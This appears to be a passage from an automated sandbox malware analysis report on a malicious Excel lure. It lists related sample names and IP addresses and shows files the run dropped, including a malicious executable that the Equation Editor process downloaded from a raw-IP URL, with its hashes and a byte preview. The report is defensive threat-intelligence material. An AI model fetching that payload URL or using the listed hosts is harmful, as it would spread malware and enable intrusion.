                                    • 52.128.23.153
                                    ocJJiP3R3A.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    PO9887655.exeGet hashmaliciousBrowse
                                    • 52.128.23.27
                                    eVpu3gcOqTGet hashmaliciousBrowse
                                    • 70.33.253.205
                                    GvrY83cA2d.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    b3astmode.armGet hashmaliciousBrowse
                                    • 69.172.202.200
                                    Quotation...exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    purchase order_8019.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    PURCHASE ORDER...exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    ADTEC-AS-VNADTECMediaJointStockCompanyVNPayment.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154
                                    Product Offerety44663573.xlsxGet hashmaliciousBrowse
                                    • 202.55.133.101
                                    Offerta Ordine765746648.xlsxGet hashmaliciousBrowse
                                    • 202.55.133.101
                                    RFQ.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154
                                    Quotation.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154
                                    Quote.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154
                                    Quotation123 19.11.21.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154
                                    FA1bgAzG2b.exeGet hashmaliciousBrowse
                                    • 202.55.133.118
                                    fras comisiones.xlsxGet hashmaliciousBrowse
                                    • 202.55.133.118
                                    Shipping Document.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154
                                    WpCifE44PS.exeGet hashmaliciousBrowse
                                    • 202.55.133.118
                                    vPoecWLHxD.exeGet hashmaliciousBrowse
                                    • 202.55.133.118
                                    justificantes anticipos.xlsxGet hashmaliciousBrowse
                                    • 202.55.133.118
                                    RFQ _161121.xlsxGet hashmaliciousBrowse
                                    • 202.55.135.190
                                    Quotation.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154
                                    CTM REQ.xlsxGet hashmaliciousBrowse
                                    • 202.55.135.190
                                    MV OCEANLADY.docxGet hashmaliciousBrowse
                                    • 202.55.135.190
                                    invoice_34567445556.wbkGet hashmaliciousBrowse
                                    • 202.55.135.190
                                    PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                                    • 202.55.134.54
                                    RFQ - R000001095.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:downloaded
                                    Size (bytes):723456
                                    Entropy (8bit):7.763310640308659
                                    Encrypted:false
                                    SSDEEP:12288:EBzcmhiTIqqxiWT/niO1/pFbHfi17evEf6BFMmEJWixDw/1LgyHixBFmRq:EBomhikV4WzNpFDfi1gqmwK1syHi1Wq
                                    MD5:0F88779E9500075DE85E916637305164
                                    SHA1:EE1B3AF259E9F03239441681F00AADDD28E4E8FB
                                    SHA-256:C98EAC88F8F4243D7303B806CB58E0A89E33270CB4B33457C91938A2B2746238
                                    SHA-512:ADEFEE155A0579DA0DC75E4AFF162635338150A884DDDDF47C732A67D69E2F56471CDDD64A7CFFB743DEFC040185CE146B713C6511B3DAC709D4956E2D30EA31
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Reputation:low
                                    IE Cache URL:http://202.55.132.154/384500000_1/vbc.exe
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..a..............0.............~.... ... ....@.. .......................`............@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H........H...!..........\j...............................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\23212CB0.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):68702
                                    Entropy (8bit):7.960564589117156
                                    Encrypted:false
                                    SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                    MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                    SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                    SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                    SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B038AAB.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):42465
                                    Entropy (8bit):7.979580180885764
                                    Encrypted:false
                                    SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                    MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                    SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                    SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                    SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview: .PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u.*.'.................//F.......h.++..j...e....A.H?>.......|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..*]\-..yG2Ne.B....\@q....8.....W./i.C..P.*...O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.*........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@*.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ*....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37582CD5.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):6364
                                    Entropy (8bit):7.935202367366306
                                    Encrypted:false
                                    SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                    MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                    SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                    SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                    SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                    Malicious:false
                                    Preview: .PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V*.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw*.....#..._....I....k.!":...H.....eKN.....9....{%......*7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+*...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V|.].-Oo..........._.;@c....`.....|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AAC3DEF.emf
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                    Category:dropped
                                    Size (bytes):498420
                                    Entropy (8bit):0.6413939525004806
                                    Encrypted:false
                                    SSDEEP:384:0JXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:0JXwBkNWZ3cjvmWa+VDO
                                    MD5:883A0909725C3877917457D6650A7419
                                    SHA1:655EB1BCBC14145E8D6C49CF674EC6AB1EF99BB1
                                    SHA-256:5B0DBAE8314EEF7EC3EC75553423735EEBA87A894A21220E46FB4494BAEF0E22
                                    SHA-512:8938B351F688B0AEF72C0771B150711E5BFBE31B9D69D0ECED56F14A53090F150368033C7FF356045ADA807BC427B1335EB471693B6B063A19E1FEBE54C688AC
                                    Malicious:false
                                    Preview: ....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Y$...@.o..f.Y.@".%.....o.`.o.......o.D.o.RQ>[..o...o.....,.o...o.$Q>[..o...o. ...Id.Y..o...o. .........t..d.Y............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...........P.o.X.....o...o..8.Y......t.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\522424D2.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):10202
                                    Entropy (8bit):7.870143202588524
                                    Encrypted:false
                                    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                    MD5:66EF10508ED9AE9871D59F267FBE15AA
                                    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                    Malicious:false
                                    Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DAD64F1.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):14828
                                    Entropy (8bit):7.9434227607871355
                                    Encrypted:false
                                    SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                    MD5:58DD6AF7C438B638A88D107CC87009C7
                                    SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                    SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                    SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                    Malicious:false
                                    Preview: .PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..T*Q.%..X.......{....,.q.\,.E".........z..*.abbB*...j.\.J.(.b.......|>...........R....L&..X.eYV"..-.R)B.T*M&..pX*.j.Z..9..F.Z.6....b.\./%..~...).B<..T*.z..D"..(...\...d2YKKK...mm.T*..l.T*..I$.x<..J..q..*.J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T*....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..|>/.Hd2....EQ.
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77C35F24.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):11303
                                    Entropy (8bit):7.909402464702408
                                    Encrypted:false
                                    SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                    MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                    SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                    SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                    SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                    Malicious:false
                                    Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7ACF70CD.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):10202
                                    Entropy (8bit):7.870143202588524
                                    Encrypted:false
                                    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                    MD5:66EF10508ED9AE9871D59F267FBE15AA
                                    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                    Malicious:false
                                    Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC7AC69.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):19408
                                    Entropy (8bit):7.931403681362504
                                    Encrypted:false
                                    SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                    MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                    SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                    SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                    SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                    Malicious:false
                                    Preview: .PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....|AQ.h4....x..\6....|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..|0...x...|..../F....o.._|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B38F263E.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):19408
                                    Entropy (8bit):7.931403681362504
                                    Encrypted:false
                                    SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                    MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                    SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                    SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                    SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                    Malicious:false
                                    Preview: .PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....|AQ.h4....x..\6....|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..|0...x...|..../F....o.._|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B76C8963.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):68702
                                    Entropy (8bit):7.960564589117156
                                    Encrypted:false
                                    SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                    MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                    SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                    SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                    SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                    Malicious:false
                                    Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E38FA527.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):11303
                                    Entropy (8bit):7.909402464702408
                                    Encrypted:false
                                    SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                    MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                    SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                    SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                    SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                    Malicious:false
